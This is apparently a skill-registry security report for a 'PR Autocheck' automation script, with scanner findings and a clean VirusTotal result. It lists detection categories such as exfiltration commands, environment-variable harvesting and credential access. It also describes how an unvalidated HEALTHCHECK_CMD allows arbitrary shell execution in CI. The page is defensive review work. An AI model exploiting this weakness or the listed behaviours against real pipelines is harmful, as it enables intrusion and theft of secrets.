ClawHub

PR Autocheck

Security checks across malware telemetry and agentic risk

Overview

This skill is a disclosed PR-check automation script that reviews git diffs, optionally runs a configured health check, saves reports locally, and posts a limited summary to Discord when a webhook is provided.

Install only where CI environment variables are controlled by trusted maintainers. Do not let untrusted PRs set HEALTHCHECK_CMD or DISCORD_WEBHOOK_URL, and review what healthcheck command and webhook destination are configured before enabling automated post-submit use.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • MCP Least PrivilegeUnderdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
Findings (2)

Lp3

Medium
Category
MCP Least Privilege
Confidence
89% confidence
Finding
The skill exposes shell execution capabilities but does not declare any permissions or trust boundaries, which can cause it to run with more authority than users or operators expect. In this specific skill, the shell is used to process repository state, invoke health commands, and potentially send data to an external Discord webhook, so the missing declaration meaningfully increases the risk of unintended command execution and data exfiltration in automation contexts.

Context-Inappropriate Capability

Medium
Confidence
98% confidence
Finding
The script executes HEALTHCHECK_CMD via command substitution without constraining it to a fixed executable or validating its contents, so any party able to influence the environment can run arbitrary shell commands in the context of the skill. In a CI/post-submit automation context, that exceeds the stated purpose of performing PR checks and is especially dangerous because such jobs often have repository access, network egress, and webhook secrets available.

VirusTotal

63/63 vendors flagged this skill as clean.

View on VirusTotal